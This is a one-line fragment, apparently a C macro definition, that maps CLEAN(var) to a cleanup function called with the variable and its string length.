CLEAN(var) cleanup(var, strlen(var))